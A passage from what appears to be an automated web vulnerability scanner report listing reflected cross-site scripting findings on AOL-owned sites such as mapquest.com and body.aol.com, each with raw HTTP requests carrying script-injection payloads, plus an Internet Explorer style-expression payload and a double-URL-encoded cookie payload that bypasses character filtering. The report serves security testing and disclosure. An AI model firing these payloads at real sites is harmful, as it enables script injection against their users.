Referer: http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.5;sz=160x600;click0=http://r1-ads.ace.advertising.com/click/site=0000787354/mnum=0000967043/cstr=18771686=_4d4f07c5,5603181230,787354_967043_1183_0,1_/xsxdata=1:93218262/bnum=18771686/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SDYN_2011Q1/160/L32/671449763/x90/USNetwork/RS_SDYN_2011Q1_AOL_DEF_160/RadioShack_SDYN_2011Q1.html/72634857383030695a694d41416f6366?http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/160/L36/1485203807/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_160/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1485203807?
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&d77e0<script>alert(1)</script>688bd651f98; ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; UID=1d29d89e-72.246.30.75-1294456810; ar_da39f516a098b3de)
Response
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 20:42:54 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p85001580=exp=44&initExp=Wed Jan 26 20:14:29 2011&recExp=Sun Feb 6 20:42:54 2011&d77e0<script>alert(1)</script>688bd651f98=&prad=58087444&arc=40461884&; expires=Sat 07-May-2011 20:42:54 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1297024974; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 26650
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"58087444",Pid:"p85001580",Arc:"40461884",Location:CO ...[SNIP]... 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&d77e0<script>alert(1)</script>688bd651f98', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:5 ...[SNIP]...
1.780. http://blackvoices.aol.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://blackvoices.aol.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b47"><script>alert(1)</script>3d9f57145f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?c2b47"><script>alert(1)</script>3d9f57145f7=1 HTTP/1.1
Host: blackvoices.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.781. http://body.aol.com/diet-fitness [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://body.aol.com
Path: /diet-fitness
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f70c"><script>alert(1)</script>9e72d383a62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /diet-fitness?5f70c"><script>alert(1)</script>9e72d383a62=1 HTTP/1.1
Host: body.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.782. http://body.aol.com/health [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://body.aol.com
Path: /health
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92bca"><script>alert(1)</script>7c84e565a30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /health?92bca"><script>alert(1)</script>7c84e565a30=1 HTTP/1.1
Host: body.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.783. http://massively.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://massively.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a395b"><script>alert(1)</script>1fd499ba9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?a395b"><script>alert(1)</script>1fd499ba9ae=1 HTTP/1.1
Host: massively.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6cbdf"style%3d"x%3aexpression(alert(1))"9fc4a542932 was submitted in the REST URL parameter 2. This input was echoed as 6cbdf"style="x:expression(alert(1))"9fc4a542932 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /aolus/searchProfiles6cbdf"style%3d"x%3aexpression(alert(1))"9fc4a542932 HTTP/1.1
Host: memberdirectory.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://profiles.aim.com/searchProfiles6cbdf"style="x:expression(alert(1))"9fc4a542932">
...[SNIP]...
1.785. http://mmafighting.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://mmafighting.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1968d"><script>alert(1)</script>dae7858fae7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?1968d"><script>alert(1)</script>dae7858fae7=1 HTTP/1.1
Host: mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.786. http://new.mapquest.com/accelerator [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://new.mapquest.com
Path: /accelerator
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ef25"><script>alert(1)</script>3c75f6d7991 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /accelerator?2ef25"><script>alert(1)</script>3c75f6d7991=1 HTTP/1.1
Host: new.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.787. http://new.mapquest.com/directions [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://new.mapquest.com
Path: /directions
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 117fd"><script>alert(1)</script>cf20941f11a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /directions?117fd"><script>alert(1)</script>cf20941f11a=1 HTTP/1.1
Host: new.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.788. http://new.mapquest.com/routeplanner [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://new.mapquest.com
Path: /routeplanner
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a335"><script>alert(1)</script>1b481572ac was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /routeplanner?9a335"><script>alert(1)</script>1b481572ac=1 HTTP/1.1
Host: new.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the _PACIFIC_COMMENTS cookie is copied into the XML document as plain text between tags. The payload 2b31a%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253e188ec506618 was submitted in the _PACIFIC_COMMENTS cookie. This input was echoed as 2b31a<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>188ec506618 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the _PACIFIC_COMMENTS cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.790. http://reference.aol.com/atlas [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://reference.aol.com
Path: /atlas
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 706ce"><script>alert(1)</script>9a001f69067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /atlas?706ce"><script>alert(1)</script>9a001f69067=1 HTTP/1.1
Host: reference.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.791. http://seed.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://seed.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 917ed"><script>alert(1)</script>7fb573477f6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?917ed"><script>alert(1)</script>7fb573477f6=1 HTTP/1.1
Host: seed.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.792. http://switched.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://switched.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c7b1"><script>alert(1)</script>5847df33818 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?4c7b1"><script>alert(1)</script>5847df33818=1 HTTP/1.1
Host: switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.793. http://www.downloadsquad.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.downloadsquad.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f04c0"><script>alert(1)</script>6faa9196b24 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?f04c0"><script>alert(1)</script>6faa9196b24=1 HTTP/1.1
Host: www.downloadsquad.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.794. http://www.greendaily.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.greendaily.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1fe5"><script>alert(1)</script>216b045a0bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?d1fe5"><script>alert(1)</script>216b045a0bc=1 HTTP/1.1
Host: www.greendaily.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.795. http://www.holidash.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.holidash.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16818"><script>alert(1)</script>962d34918d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?16818"><script>alert(1)</script>962d34918d3=1 HTTP/1.1
Host: www.holidash.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.796. http://www.kol.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.kol.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa7e4"><script>alert(1)</script>afcc3115f86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?fa7e4"><script>alert(1)</script>afcc3115f86=1 HTTP/1.1
Host: www.kol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.797. http://www.massively.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.massively.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aff45"><script>alert(1)</script>4eeb20794a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?aff45"><script>alert(1)</script>4eeb20794a9=1 HTTP/1.1
Host: www.massively.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
1.798. http://www.new.mapquest.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: Information
Confidence: Certain
Host: http://www.new.mapquest.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cff0"><script>alert(1)</script>3cccc8372ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /?9cff0"><script>alert(1)</script>3cccc8372ba=1 HTTP/1.1
Host: www.new.mapquest.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 301 Moved Permanently
Date: Sun, 06 Feb 2011 19:47:56 GMT
Server: ArtBlast/3.5.5
MIME-Version: 1.0
Expires: Sun, 06 Feb 2011 20:17:56 GMT
Content-length: 136
Content-type: text/html
Location: http://www.mapquest.com/?9cff0"><script>alert(1)</script>3cccc8372ba=1